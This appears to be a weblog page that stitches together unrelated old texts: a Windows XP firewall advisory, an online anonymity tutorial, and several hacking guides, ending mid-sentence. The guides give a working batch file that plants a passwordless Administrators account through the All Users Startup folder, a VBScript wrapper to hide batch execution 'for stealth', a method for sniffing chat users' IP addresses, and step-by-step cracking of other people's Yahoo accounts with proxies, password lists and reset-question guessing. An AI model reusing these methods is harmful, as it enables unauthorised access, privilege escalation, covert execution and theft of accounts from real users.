Weblog
Thursday, October 25, 2007
-
Microsoft Windows XP Firewall Default Configuration Vulnarability
Summary
After you set up Microsoft Windows Firewall in Microsoft Windows XP Service Pack 2 (SP2), you may discover that your computer can be accessed by anyone on the Internet when you use a dial-up connection to connect to the Internet, this is due to a back in the way Microsoft's Firewall handles local subnets.
Details
This problem occurs because of the way that Windows Firewall interprets local subnets when the "My network (subnet) only" option is used. Windows Firewall is included with Windows XP SP2.
Because of the way that some dialing software configures routing tables, Windows Firewall in Windows XP SP2 can sometimes interpret the whole Internet to be a local subnet. This can let anyone on the Internet access the Windows Firewall exceptions. When the "My network (subnet) only" option is enabled, it is automatically selected for file and print sharing. Therefore, your shared drives can be unexpectedly revealed on the Internet when you use a dial-up connection.
Solution:
To resolve this problem, you must download and install the Critical Update for Windows XP: KB886185
After you install the Critical Update for Windows XP (KB886185), Windows Firewall will no longer interpret a dial-up network connection to be on your local subnet.
Specifically, any IP Route Table entry that has an IP address of 0.0.0.0 and has a mask of 0.0.0.0 will not be interpreted to be on the local subnet. This means that any port exceptions or program exceptions that use the "My network (subnet) only" option in Windows Firewall will not be available over a dial-up connection. You will still be able to access exceptions over a dial-up connection if you remove all scope restrictions, or if you create a custom scope for exceptions.
Subnets can be highly variable, depending on the network that they are connected to. Therefore, using the "My network" scope restriction does not guarantee security. We strongly recommend that you use the custom scope option when you want to make sure that no unwanted incoming traffic is permitted to pass through your firewall exceptions.
For more information about configuring Windows Firewall, visit the following Microsoft TechNet Web page: http://www.microsoft.com/technet/community/columns/cableguy/cg0204.mspx
Additional information
The information has been provided by Nathan Fowler. The original article can be found at: http://support.microsoft.com/kb/886185The Anonymity Tutorial / written by yours truly, Joseph (blacksun.box.sk)
<=============================================================================> version 1.5, 22/3/00
Note: whenever you see something like this: blah(1) it means that if you don't understand the meaning of the word blah there's an explanation for it just for you, located on the newbies corner on section 1.
Note 2: if you're having a hard time reading this page because you have to scroll to the right whenever a long line comes, it's probably because you're not using "word wrapping".
Most UNIX text editors and advanced Windows editors (and some less advanced ones like Wordpad) do this by themselves.
To do word wrapping on Microsoft Notepad, simply go to Edit and then click on "Word wrapping".
Author's notes
==============
If you have any comments or questions regarding this tutorial (no flames(10) or spam, please) Email me at barakirs@netvision.net.il.
Visit blacksun.box.sk for more tutorials, free hacking/programming/unix books to download and much more.
Disclaimer
==========
We do not encourage any kinds of illegal activities. If you believe that breaking the law is a good way to impress someone, please stop reading now and grow up. There is nothing impressive or cool in being a criminal.
Contents
========
Anonymity?
* You mean I have absolutely zero anonymity on the web?
* So what? Why would I wanna be anonymous anyway?
* Okay, I see your point. Anonymize me.
Proxies?
* What are proxies?
* What are public proxies?
* Where can I find lists of public proxies?
* Are they good for anything besides anonymity?
* Okay, so how do I use them?
Wingates?
* What are Wingates?
* How can I use them to anonymize myself?
* Wingates sound useful. I wanna run one on my own computer. How do I do it without turning it into an "anonymity hive"?
* How can I tell IRC clients, instant messangers such as ICQ, etc', to use them?
Anonymous Remailers?
* What is an anonymous remailer?
* How can I use them to be more anonymous?
* Why would a person start an anonymous remailing service? Where's the catch?
Encryption?
* Why should I encrypt my Email?
* How can I encrypt my Email?
Cookies?
* What are cookies?
* Can they risk my privacy?
.chk files?
* What are they?
* How can they risk my privacy?
The Anonymizer?
* What is the anonymizer?
* How can I sign up?
Where can I learn more about anonymity?
* Useful URLs.
* Other useful tutorials by Black Sun.
Appendix A: Using Altavista as a "proxy"
* How can I use Altavista's web translation service to anonymize myself?
Appendix B: Spoofing browser history
* How can I spoof my browser's history?
Appendix C: the +x mode
Bibliography
* http://www.theargon.com
* Anonymizer.com
* Various tutorials
Other Tutorials By Black Sun
* FTP Hacking.
* Overclocking.
* Ad and Spam Blocking.
* Sendmail.
* Phreaking.
* Advanced Phreaking.
* Phreaking II.
* IRC Warfare.
* Windows Registry.
* Info Gathering.
* Proxy/Wingate/SOCKS.
* Offline Windows Security.
* ICQ Security.
Anonymity?
==========
Whether you realize it or not, the Internet is not as anonymous as you might think. Here are a few examples:
1) You enter a website. Once you hit any one of the files on the webserver, the website owners can find out these pieces of information about you, and much more:
1. Your IP Address.
2. Your hostname.
3. Your continent.
4. Your country.
5. Your city.
6. Your web browser.
7. Your Operating System.
8. Your screen resolution.
9. Your screen colors.
10. The previous URL you've been to.
11. Your ISP.
And this is just the tip of the iceberg. Go to our homepage at blacksun.box.sk and find the web statistics button (later addition: we have terminated our account on our webstats provider because they were quite buggy, and we've decided to use a php3-based text counter). There you will be able to see how much we can tell about our visitors
2) Another example: you're connected to an IRC network and you are chatting with your friends. Right now all a person needs to find information on you is nothing but your nickname. He doesn't even have to know you, or be in the same channel/channels you are. Here are a few examples of what you can find by simply knowing a person's nickname (in the most optimal conditions):
1. Your real name.
2. Your Email address.
3. Your IP address.
4. Your hostname.
5. Your ISP.
6. Your continent.
7. Your country.
8. Your city.
And much much more.
The same goes for online games that allow players to view the other players' IP addresses.
3) Suppose my name is Paul Matthews, and my Email address is pmatthews@boring.ISP.net. It is extremely easy to figure out that the first letter of my first name is P and that my last name is Matthews, but that's not all.
Some ISPs give their entire listings to web directories. Meaning, people can go to, say... whowhere.com, punch in the words Paul Matthews or search for people with Matthews as their last name on boring.ISP.net and find out that pmatthews@boring.ISP.net does actually belong to Paul Matthews, hence discovering your real name.
But it is also possible to use these web directories for 1,001 uses. Therefore you should go to whowhere.com as soon as possible, try to track down yourself and then tell whowhere.com to delete your listing.
4) Some ISPs also run finger daemons.
A daemon is a program that waits for incoming connections on a specific or several ports.
The finger daemon is a daemon that waits for open connections on port 79. Once you get in, you need to punch in a username on the system the daemon runs on and you will get tons of information about him.
For example: a while ago my ISP was running a finger daemon on their servers (until I forced them to take it off because it was a privacy invasion). Now, suppose you know nothing about me besides my Email address, which is barakirs@netvision.net.il. The first thing you should do is to go to netvision.net.il on port 79 and hope there's somebody there. If there is, you can find the following information by typing in my username, barakirs:
1. My real name.
2. When was the last time I was online.
3. If I'm online right now, since when have I been online.
4. Whether I have new mail or not.
And much much more (some finger daemons might give out any pieces of information, such as my home address and phone number).
Besides the obvious uses (finding a person's real name and other private information), you can use this information for various purposes, such as:
1. Most instant messangers, such as ICQ, AIM, YAHOO Instant Messanger and MSN Instant Messanger, allow you to add people in or outside your contact list to an "invisible list", so they won't be able to know whether you're online or not and you'll appear to be offline to them. If they have your Email address, and your ISP is running a finger daemon, they are able to know whether you're really offline or just trying to fool them.
2. Your friend promised you to do something for you on the net, but when you finally go online to ask him if he's done it he says that he just got back from work and that he just got online. Using finger, you can test this and see when he really got online.
These were just a little out of many examples.
During this tutorial I will explain to you how to prevent people from finding out information about you (there will always be new tricks, but blocking the most basic / common ones will hold off most attackers and make it harder for the more experienced ones). If you really wanna learn how to do these things, as well as some really cool and advanced tricks, then read the 'Info-Gathering' tutorial.
Proxies?
========
Proxies were first invented in order to speed up Internet connections. Here's how they work:
You are trying to connect to a server on the other side of the planet. Your HTTP requests are sent to your proxy server, which is located at your ISP's headquarters, which are a lot closer to you than that far-away server. The proxy first checks if one of it's users has accessed this website lately. If so, it should have a copy of it somewhere on it's servers. Then the proxy server starts the connection only to check if his version is not outdated, which only requires him to look at the file size. If it has the latest version, it will send the file to you, instead of having the far server send it to you, thus speeding up the connection. If not, it will download the requested files by itself and then send them to you.
But proxies can also be used to anonymize yourself while surfing the web, because they handle all the HTTP requests for you.
Most chances are that your ISP has a proxy. Call tech support and ask them about it. But the problems with proxy access given to you by your ISP is:
1. Some ISPs don't even have proxies.
2. The website owner would still be able to know what ISP you are using and where do you live, since this kind of proxies are not public and they can only be accessed by users of that ISP. For such cases, there is a solution - public proxies.
You can find a list of public proxies everywhere. Here are two good URLs to start from:
1. http://www.theargon.com
2. http://www.cyberarmy.com/lists
To configure your web browser to use a proxy server, find the appropriate dialog box in your settings dialog box (it varies from different browsers).
Note: some proxy servers will also handle FTP sessions (some might handle FTP only).
Wingates?
=========
Wingate is a program that is used to turn a PC running Windows 9x or NT into a proxy server. Here are several reasons for why a person would want to run such an application and turn his computer into a proxy:
1. If he owns an ISP and he wants to set up a proxy for it.
2. If he wants to turn his computer into a public proxy.
3. If he wants to give Internet access to a whole bunch of computers that are connected by a Local Area Network, but he can provide Internet access for only one computer. In that case, he would turn his computer into a proxy server and set all the other computers on the network to use him as a proxy. That way all the rest of the computers on the network will relay their HTTP and FTP requests through a single computer, a single modem and a single Internet account.
The problem with Wingates is that they're highly... well... they're very... how should I say this? Stupid. Just plain stupid. Why is that?
EVERYONE can connect to your little proxy by simply connecting to port 1080 on your computer and typing 'target-ip-address-or-hostname port' (no quotes) and replace target-ip-address-or-hostname with the IP address or the hostname they want to connect to, and replace port with the destination port. The "wingated" mahcine will then relay your input through it, but it will seem like the wingated machine is connecting to the target computer, not you.
Sure, the sysadmin of the wingated machine can change that port to a different one, but this is the default, and if you're stupid enough to use Wingate you probably won't want to play with the defaults.
First of all, if you need to use Wingate for some reason, use SyGate instead. It does exactly what Wingate does, only it won't serve EVERYONE like Wingate does.
Now, these Wingates can be used to anonymize practically anything. Also, every program that can be set to run behind a SOCKS firewall (most IRC clients, most instant messangers and most web browsers) will automatically do the dirty work of routing your stuff through it if you'll give them the IP/hostname and the appropriate port for the wingated machine.
Wingates can also be used to get into IRC channels you got banned from (by faking your IP).
WARNING: some IRC networks run bots that will kick out people using Wingates. These bots try to connect to random people on port 1080. If they succeed, they kick you out. This works because the IRC network, as well as everyone on it, thinks that your IP is the wingated machine's IP. If the bot tries to connect to your IP on port 1080, it will actually go to the wingated machine. The bot will then detect that your IP is actually a wingate and kick you off (since it's being run by the IRC network and given enough priviledges to kick out anyone).
You can find lists of Wingates at http://www.cyberarmy.com/lists. There are also tons of Wingate scanners out there that can scan whole subnets and look for Wingates, but this might take some time (and make your ISP get suspicious), so you'd just better go for CyberArmy's lists.
Anonymous Remailers?
====================
Previously I have demonstrated to you what a person with very little knowledge can find out about you just by knowing your Email address. Now it is obvious that to keep your privacy, you need to sign up for a free Email account (such as Hotmail [hotmail.com], Yahoo mail [mail.yahoo.com], ZDNet Mail [zdnetmail.com], Net @ddress [netaddress.com], Bigfoot [bigfoot.com] etc'). But what if you had a special Email address on a free server that automatically forwards all incoming Email to your real mailbox and keeps all the information discreet?
These are called Anonymous Remailers. Most of them are free and live out of contributions and/or sponsor banners they place on their website.
You can find many many Anonymous Remailers at http://www.theargon.com.
Here's a good example for an Anonymous Remailer:
First, head to http://anon.isp.ee (by the way, the extension .ee stands for Estonia) and sign up your free account. Once you're a registered user, send an Email to robot@anon.isp.ee with no subject and the following content:
user: your username
pass: your password
realaddr: your recipient's Email address.
realsubj: the subject of your mail.
Example: if I want to send an anonymous mail containing the following:
Subject: ANONYMITY RULEZ!!
Hi.
This is an anonymous Email message.
Let's see you trace me now!
to bgates@microsoft.com, and your username is user and your pass is pass, send the following Email to robot@anon.isp.ee (remember not to enter a subject):
user: user
pass: pass
realaddr: bgates@microsoft.com
realsubj: ANONYMITY RULEZ!!
Hi.
This is an anonymous Email message.
Let's see you trace me now!
You'll receive an Email notification from anon.isp.ee once your message has been delivered.
Once your recipient will reply to this Email, the message will return to you.
You can also use web-based anonymous remailers such as Replay Associates (replay.com/remailer/anon.html), but it won't let you receive replies.
Encryption?
===========
Everyone can read your Email. Whether it's some script kiddie who hacked your Hotmail account, a skilled cracker (or a script kiddie with a lot of free time) that hacked your POP3 mailbox or a person who got your Email by mistake. If you don't want other people to read your Email, use PGP.
Everyone who uses PGP can have their own PGP key. A key consists of tons of characters, whether they are lowercase or uppercase letters, number or symbols. After you make your key, you need to transfer it to everyone you want to send encrypted mail to. Once they have it, you can start sending encrypted mail to them and they'll be able to use your key to decrypt it.
More info on www.pgpi.com.
Note: PGP is very strong and can only be broken with giant supercomputers. The longer your key is, the harder it is to break the encryption.
Cookies?
========
Have you noticed how all those websites on the net are getting "smarter" all of a sudden? You know, like the way message boards remember your nickname, some sites remember your password so you won't have to retype it every time, electronic malls remember what you last put in your virtual shopping cart etc'.
This is all because of cookies. Cookies are small files which a website can request your browser to create and then retrieve information from them. Websites can put your password or any other information in these files.
If you don't want your co-workers or other people to sniff around and see where you've been visiting, what items you've been buying etc', you should delete them when you don't need them.
On Unix, your cookies would usually be stored somewhere in your home directory (usually /home/your-login, /usr/your-login or /usr/local/your-login if you're a regular user and /root if you're root, but anyone with write access to /etc/passwd can change that).
On Windows and Mac, cookies are stored on a sub-directory at your browser's directory called cookies.
Note 1: you can tell your browser to ask you before accepting a cookie. Just play around with it's preferences menu, you'll find it (there are so many browsers out there so I can't give a detailed explanation for every single one).
Note 2: if you're browsing from a public computer, do not save any cookies, or other people will be able to snoop around and look at your cookies or even enter various websites with your passwords, your credit card number etc'.
A reader called Stone Cold Lyin Skunk has pointed out to me that the cookies.txt file may be found in the netscape\users\default directory. This happens when you register your user (Netscape let's you have multiple users for the same program, each user with his own settings etc') without giving it a username.
He also pointed out to me that some websites will require you to accept cookies in order to enter them.
Also, he recommended to beware of your browser's history file (information on removing it can be found on the "Where Can I Learn More About Anonymity?" chapter), as well as your cache and your preferences.js files, because they may reveal your browsing habits (where have you been, etc').
.chk files?
===========
Stone Cold Lyin Skunk has pointed out that if you're running Windows and you do a quick reboot (hold down shift while telling Windows to reset) Windows generates a file called FILE0001.chk, FILE0002.chk etc' (usually found on c:\). You will be amazed to see how much information you could find in these files! Delete them ASAP!
The Anonymizer?
===============
The Anonymizer is an Internet service that helps you anonymize yourself better. The Anonymizer's homepage is www.anonymizer.com. Here's a snapshot from anonymizer.com:
+++++
Company Overview
----------------
Anonymizer.com is a pioneer in Internet privacy technologies, and the most popular and trusted name in delivering online privacy services. Anonymizer.com, today, has many thousand subscribers to its paid services and makes anonymous over 7.5 million pages a month. Lance Cottrell, founder and President of Anonymizer.com, authored the world's most secure anonymous remailer, Mixmaster and has been active for many years in promoting free speech. Lance received his undergraduate degree in physics from The University of California, Santa Cruz and a masters in Physics from The University of California, San Diego.
Justin Boyan, while a Computer Science Ph.D. student at Carnegie Mellon University, designed and implemented Anonymizer surfing. Anonymizer Surfing is now in its 4th generation under development by the Anonymizer engineering team.
Our Mission
-----------
Our mission is to ensure that an individual's right to privacy is not compromised once they are online. We began this company as a means to protect this right as embodied in the United Nations' Universal Declaration of Human Rights:
"No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honour and reputation. Everyone has the right to the protection of the law against such interference or attacks."
While written 50 years ago, article 19 of this document is now more than ever applicable with the advent of the recent growth of the Internet:
"Everyone has the right to freedom of opinion and expression; this right includes freedom to hold opinions without interference and to seek, receive and impart information and ideas through any media and regardless of frontiers."
You can read the full Universal Declaration of Human Rights on the following URL: http://www.unhchr.ch/udhr/lang/eng.htm.
+++++
You can use The Anonymizer to surf the web with anonymity for free by going to anonymizer.com and typing in the target URL where asked, or buy an Anonymizer package, which will give you more benefits. If you want some of the money you pay to go to Black Sun, subscribe through the following URL: http://www.anonymizer.com/3.0/affiliate/door.cgi?CMid=12437.
If you want, you too can join their affiltrates program. Simply go to http://www.anonymizer.com/3.0/affiliate/afdoor.cgi?CMid=12437 for more information. If you will subscribe through this URL, you will still receive all the cash you deserve, but we at Black Sun will also receive some benefits.
Where Can I Learn More About Anonymity?
=======================================
Useful URLs: http://www.theargon.com.
http://www.pgpi.com (for learning about PGP encryption and how to use it to encrypt your Emails)
IP Spoofing Demystified - a long article from Phrack magazine on IP spoofing (faking your IP). You can download it from our books section.
http://www.cyberarmy.com/lists - for lists of Wingates, Proxies and free shell accounts you can surf from to anonymize yourself.
http://2waymedia.hypermart.net/hh/browsers/index.htm - how to completely clear your browser's history
Other useful Tutorials by Black Sun: IRC Warfare by The Cyber God (for learning more on Anonymizing yourself on IRC), Proxy/WinGate/SOCKS tutorial by Jatt and Sendmail by me, R a v e N.
Appendix A: Using Altavista as a proxy
======================================
If you go to altavista.com, and under their tools section choose translation (or go directly to the following URL: http://babelfish.altavista.com/cgi-bin/translate?), you can ask Altavista to translate web pages for you.
But you can also use this as a proxy, since when you tell Altavista to translate a web page, Altavista's CGI translation script retrieves the page for you.
Thanks to Yoink for this information.
Appendix B: Spoofing browser history
====================================
Here is something I got by Email from a reader called Stone Cold Lyin Skunk:
set up a V3 redirect (http://www.v3.com or something like that)
then build a quick webpage with a link to the site you want to
view discretely
then go to your webpage via the V3 redirect
all I know is that the URL indicatoer at the top of th e borwser
will not show the URL you visit even your own .index page
it will only show the URL name
so if there is URL logging at your job or school or whatever,
they can always surf to your homepage via the V3, which they will
have. But, by then, you will have erased or. Or maybe it has
"hidden" links (links the same color as the background)...
in any case, they will not have your URLs and they certainly
won't have proof you surfed there...
for instance, you may not want, say, your local library sysop to
know about Black Sun...so you set up say, a Homestead homepage (these are
great because they feature password protected pages) ...you then
set up a V3 redirect to that page. Bingo- you can now surf to the
page via V3, log in with your password, hit all those cool hidden
links to Black Sun, CYberArmy, peacefire.org what wahtever, and the
URL snoop software will only record the original http://surf.to/fakeoutname
... and don't forget, make the V3 URl as
innocuous-sounding as possible...eg. http://surf.to.backetweaving ...
Appendix C: the +x mode
-----------------------
In IRC, it is possible to put yourself into mode x by typing '/mode yournick +x' (do not include the quotes and replace yournick with your own nick. For example: /mode raven +x).
This tells the IRC server to hide your IP, so when others try to /whois you or /dns you, they won't be able to get your IP (they will get a partial IP instead).
This will only work on some servers, but when you're on IRC, it is recommended to use this option.
Also, there is a way to bypass this. By simply creating a DCC connection with someone else (either a DCC chat or a DCC file transfer), you could then type 'netstat' (without the quotes) on either Unix or Windows/DOS and see what connections your computer is currently handling. One of them will be the DCC connection to that other guy.
Why is that? Because DCC stands for Direct Client Communication, which means that DCC actions are not done through the server, but directly (think - why would the owners of the IRC server want people to transfer files through their servers and initiate private chats through their servers? It'll just chew up some bandwidth). The netstat command shows all current connections (local or remote), and one of them will be your DCC connection with that other guy. You will then be able to see his/her IP or hostname.
Note: on some networks this is done by typing /mode yournick +z
Appendix D: Anonymity on Usenet
-------------------------------
Do you post on Usenet regularly? Are you concerned about your anonimity?
Then you should go to www.deja.com and sign up for a free account which will let you post anonymously.
Nothing will be revealed about you, not even your IP, since deja.com handles the actual posting.
Bibliography
============
1) The Argon - http://www.theargon.com
2) The Anonymizer - http://www.anonymizer.com
3) Various tutorials spread across the net.Getting Administrator Access on a Computer- using a simple batch file
This is a 3 part Tutorial for Creating your own Administrator account
on a computer using a batch file.
// when you see "//" it means i am typing a comment
//This will not work on all computers, and requires administrator
access to run the batch properly
-----------------------------------------------------------------------------------------
Part A
1. Open Notepad
2. paste the following into notepad (no quotes)
"@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin"
3. Save the file as whatever.bat
// it can have whatever filename you want
// but must contain the .bat file extension
4. Save the batch file to a floppy disk
------------------------------------------------------------------------------------------
Part B
// This is for if you have administrator access to the computer
1. Just run the batch file by double clicking
------------------------------------------------------------------------------------------
Part C
// This is for if you do not have access to administrator
1. put floppy in computer
2. Right click on the batch file click copy
3. go to C:\Documents and Settings\
// now you should see some folders with users names
// look for an admin folder or an all users folder
4. open the folder, should be something like C:\Documents and Settings\All Users\
// look for a startup menu folder
5. open the folder, should be someething like this C:\Documents and Settings\All Users\Start
Menu\
// now look for either program files, programs, or startup
6. open the folder, should be something like this D:\Documents and Settings\All Users\Start
Menu\Programs\, or D:\Documents and Settings\All Users\Start Menu\Programs\Startup
// if its like the second choice skip to step 8
// now look for a start menu folder
7. open the folder, should look like this D:\Documents and Settings\All Users\Start
Menu\Programs\Startup
8. Now Paste the Batch file into the Start Menu
// Done! Now wait about a week (or however long u think it will take
for the admin to log on and come back, try logging in as the new admin
account, if it works great, you have yourself an admin account on that
computer
Subject: Stealth execution of a batch file
==============================================
Batch files are great. Easy to make and execute they are (in my
opinion) one of the best ways to manipulate a system. The problem
with batch files is that they open up the "DOS window" to execute,
alerting the user that code has been executed. Sometimes that works
against you, as a cornerstone of hacking (in my opinion) is stealth.
By not allowing the target to know that they are a target, you give
yourself more time, access, and less chance of being either detected
or stopped.
So... there is a way to run batch files WITHOUT a dos window. We'll
use Tom, Dick, and Jane as examples.
You'll need 3 files.
Dick.BAT
Jane.VBS
Tom.BAT
In Dick.bat (this runs your batch file 'silently') type:
wscript.exe "C:\pick a dir\Jane.vbs" "Tom.bat"
In Jane.vbs type in:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """",
0, False
Name the .bat you want executed "silently" Tom.bat
There you have it. Simply, Jane makes Tom run silent, while Dick
executes Jane. Run Tom, run! -
Section 1: The Introduction
----------------------------
Greetings, and welcome to the second installment of my Yahoo! Chat Tips
& Tricks tutorial. It's been a little over a year since I wrote the
original Yahoo! Chat Tips & Tricks, and a few things have changed since
I wrote the original. Therefore, though it wasn't exactly one of my
proudest works, I figured it would only be right to put together a
second installment. So, as always, sit back, read, and learn...
Section 2: IP Grabbing (revisited)
-----------------------------------
All right, well in the first installment, I started off the tutorial
with a discussion on common techniques of ip grabbing (obtaining the
ip address of a user on Yahoo! Chat), so I felt it only fitting to
come back to this topic and add a couple of techniques that I left out.
In the original tutorial, I discussed three common techniques used for
obtaining the ip address of another user. The problem with the
techniques originally described is that it depends on a somewhat
personal contact with the intended target in order to retrieve these
ip addresses. Well, what if the intended target is someone who hates
us? Someone who would not allow any such contact needed to obtain their
ip address? Do we just forget about it then? No, we find alternative
methods. For this technique what you will need to do is go to
www.ethereal.com and download the latest version of Ethereal, and also
install winpcap if we have not installed it before. Do you have both
downloaded and installed? Good, now some of you may be looking at this
and wondering "Ok, what the hell did I just download?". Ethereal is a
packet sniffer, and is used in order to capture and analyze packets that
are being sent and received on our computer. Now that you have all this
installed what you will do is open up your chat client (Y!M, YahElite,
Y!MLite, whatever), and then load up Ethereal. Now before you start I
will need you to go into Filter settings and specify the packet sniffer
to only capture ymsg packets. Otherwise, you will have a huge list of
captured packets that aren't even related to the service you are
targeting. So have you done that? Good, now send a voice conference
invite to the target user, and set Ethereal to start sniffing. What you
will be doing now is waiting for the message to appear as to how the
user responded. Doesn't matter whether he/she accepts or declines, you
will still get the ip address. Now once you have received the response
message from the user, stop Ethereal and look through the packets listed
for the response sent to your computer. Though you have set filters to
capture only YMSG packets, you will still have many packets to look
through. This is a rather tedious task, but is necessary. Once you
have located the response packet, analyze the header of the packet to
find it's source address. The source address of this response packet
should be the ip address of the other user, but just in case load up a
tool like Sam Spade and use it to find out the host name of this
address just to make sure, since the Yahoo! server that transmitted this
packet to you will as well be listed within the header on the packet.
If you have done everything correctly then you should now have the ip
address of the other user. If all this seems hard and tedious for you
then you can look on www.custom-owns.com for a tool created by a
programmer who goes under the name markus called IPGetter. It's a
program that supposedly does all this work for you, but I have not
tested it out myself so you would have to try it out yourself. Again,
the best part about this trick is that whether they accept or decline
the conference invite, you still have the ip address. SO it's a win-win
situation. Enjoy. =)
Section 3: Cracking Illegal Accounts
-------------------------------------
Well this is very far from a new topic, but since there is no known
tutorial that I know of that accurately and coherantly describes the
steps to cracking these types of accounts, I decided to explain these
steps to you myself. For those of you who don't know for some odd
reason, illegal accounts are yahoo accounts that were created before
Yahoo! set standards for creating screen names. Before 1999, users were
allowed to use pretty much any character they wanted to, in any order
they wanted to, to create screen names. This made for some fairly
interesting looking accounts. Then around 1999 or so, Yahoo! patched up
this issue and set more strict standards for creating screen names,
since they said that these old names were interfering with their email
service. So since then illegal accounts became more rare, and thus more
valuable to a Yahoo! user. Today this activity is not quite as common
as it used to be, though still dominate among a small circle that
usually troll around Bitchin (Computers & Internet/User Rooms) to show
off their latest cracks (primarily since cracking these types of names
is a tad bit harder than it used to be). So what is the point in this
activity? Well the primary reason is to just have a cool looking account
to show off around the chat rooms, though their rarity can also make
them easily auctioned or sold (in case you need some extra revenue, and
who doesn't). So let's get started shall we. Well for this task we will
need an assortment of tools. First what we will need is of course a list
of illegal accounts to attempt to crack. There are a seemingly endless
flood of yahoo-related sites out there to get these tools, but for this
tutorial I will be concentrating on one specific yahoo-related site,
since it's fairly reliable, and the programs listed on the site usually
work. So what we will be first looking for is a name generator/scanner.
You can either get specifically a name generator and a name scanner, or
you can download a program that does both. Generation XXX is a great
example of such a program, and can be found at www.custom-owns.com.
Once we have this downloaded we will want to attempt to make a fairly
large sized list of potential names that we will be interested in
cracking. The layout is fairly simple to understand, so I won't bother
giving you step-by-step instructions on working on of these programs,
but I will offer you some suggestions. First and probably most
importantly is that your name list needs to be a fairly large size.
I'm not talking about a couple of hundred, or even a couple of thousand,
but at least over 10,000 names. The reason why is that in the cracking
process we are going to be using a distributed cracking attempt, trying
each password against our list of accounts of interest, and the more
accounts we have on our list, the better chance we have of cracking
one. Another suggestion is if you are interested in getting some nice
looking accounts, to not only scan for words of interest, but also
certain special characters. Try scanning for accounts with certain
smileys in the names, like ":)" or ">:)", as well as certain numbers
and such like "4:20" or "666". Your only limit is your imagination, and
it's strongly suggested to use your imagination when scanning for these
accounts. You may find this step to be somewhat of a tedious process,
but remember, the more names you have in your list, the better your
chances are of getting a match. Don't expect instant results. Now that
we hopefully have a fairly large name list, we are going to want to have
a list of proxy servers to use in our attempt. For this what I will ask
you to do is go to www.proxyblind.org and grab all the proxy servers
listed on their list. Recently they have disabled visitors from simply
copying and pasting the proxy servers listed, but you can easily get
around this by simply saving the web page onto your desktop (usually
it's File/Save As). Then open up notepad (Start/Run/notepad), and
opening the .html document that has been saved on your computer. Then
scroll down the source, and you should see the listed proxies within
the source. Now you can simply copy, paste, and save this list onto
a new text document, and save. So is that it? No, most of the proxies
listed are disabled almost immediately after they are posted, because
of unusually frequent use (which can slow down internet usage with the
network hosting the proxy server). So what we will do now is go to
google.com and search for "aatools download". The top listed sites
resulting from this search should be the download pages for this tool,
so we will go to these sites and download AATools. Once you have
downloaded this tool, you will probably want to get a crack for this
program, since it's only shareware, and a lot of features are disabled
until the program is registered (like being able to scan the ENTIRE
proxy list). For this we can go to www.crackspider.net and search for
a crack for this program. You will want to check out the "About" tab
within AATools to get the exact build for the software you have, then
search for the full name of the program, including the build, in the
search tab to find a crack for it. Once you have done this, just simply
open up AATools, and go to Proxy Checker. Then simply load up the proxy
list, and scan. Then save the active proxies found in the proxy list,
and we are done for this step. Now what we will need are some password
lists. On the custom-owns site, you should be able to find several
password lists, including a .zip file containing an assortment of
different word lists that you can use. Now that we have all this, we
can finally get the cracker that we will use to crack these names. This
is really your choice, and there are plenty to choose from. Just make
sure that the cracker you use has proxy options. One thing you will need
to do, since programmers who concentrate their work around Yahoo! seem
to be a little less than perfect, is first give your cracker a field
test before you actually put it to work. That way you don't end up
wasting your time running a cracker that doesn't work. For this just
create two different .txt files. Set one for a name list, and one as a
word list. In the name list you will put in an account you own, and
perhaps at least 5 other random names, like this...
some_random_account1
some_random_account2
some_random_account3
your_account_here
some_random_account4
some_random_account5
Then of course save it as test_namelist.txt or something like that. Then
open up notepad again and create a test word list, for example...
somerandompass
anotherrandompass
anotherfakepass
yourpasswordhere
fakepass
falsepass
Then of course, once again, save this as test_passlist.txt. Then simply
load up your cracker, load up these two lists in their proper place,
put in your proxies, and let her rip. If the cracker goes through this
list and doesn't match your_account_here with yourpasswordhere then you
will delete this cracker and try another one. Make sure to set how many
sockets are used before you even try testing, since how many sockets
you set the program to use can greatly increase or decrease it's
accuracy (you should see a tab on the program somewhere that says
"Sockets"). If you are on dialup then probably the best setting is
around 10 sockets, and if you are on cable or dsl then it's you should
do just fine setting your sockets at somewhere around 30. I'd like to
note that it's hard to find a cracker that works well with dialup, so
if you are on this type of connection, then don't give up hope. Just
know that it's going to take you a little longer to find a reliable
cracker. So now that we have put together our name list, our proxy
list, our pass list, and hopefully found a working cracker, then just
load all these up and start the cracker. Please take note that there
are no instant results to this type of activity. It will take a lot
of time, and depending on what kind of person you are, maybe a good bit
of your patience. Just remember to keep your cool, and you should
be ok. If you don't get a match the first try, don't worry. Just load
up a different word lists, gather up some new proxies, and take another
whack at it. You can also try other ways of obtaining access to
these types of accounts if you like. Another good technique for
obtaining illegal accounts is info cracking. In case you didn't read my
"How to Break Into Email Accounts" tutorial to get information on this
type of cracking, info cracking is the process of breaking through the
"Forgot My Password" prompt in order to gain access into the account.
If you are targeting a specific illegal account that seems to strike
your fancy, then you can look on the profile on the account for
information that might help you with getting through this prompt. If
that doesn't work out for you, then you can use an info cracking
tool to scan your name list to attempt to crack through the first page
on the "Forgot My Password" prompt. LBC (List Birthday Cracker) and
Info-It are examples of tools you can use for this purpose. Then once
you have found a match, then you can look on the account and put in
this information to get to the secret question. This has somewhat of an
advantage over trying to crack the password, since usually the answer
to a secret question is much easier to guess than the password to an
account. There may or may not be a cracker for this prompt (I know there
used to be one, but I'm not sure if it still works or not), but if you
are willing to put in the time, then with a little imagination, it
shouldn't be a problem to manually attempt to crack through this
page. A helpful hint for you if you do start successfully cracking
different illegal accounts is to not trade with anyone unless you know
them personally. You will most likely get a lot of offers to trade, but
an alarmingly majority of the people who will be interested in trading
with you are "rippers", who will simply go in, change the password, and
take the account for themselves without giving you anything in return.
So be weary of these types. Anyways, that concludes it for this section.
Just remember to be cool, keep your patience, and you should do just
fine.
Section 4: Creating Dot Names
------------------------------
Of course, as you may know, you are normally not allowed on Yahoo! to
create names with a "." in the name. This would lead you of course to
believe that the only way to obtain such a name is to load up a cracker
and attempt to break into one. Luckily for you, at least for the time
being, there is an easier way. In case you don't understand anything
about the Chinese language, I will offer a short explanation for you
(you will understand why in a minute). In this language, and certain
similar languages, surnames are appended to the name of the person you
are addressing to show respect for his/her sex, status, or position.
Therefore, surnames for Chinese users are also allowed to be appended
to Yahoo! screen names. These surnames are appended to the name via a
".", and at this point you should see where I am going with this. So
what you will do to create your own dot name is to the following url...
https://reg.cn.yahoo.com/cnreg/cnreg_first
When you go to this site you will see a login page written in standard
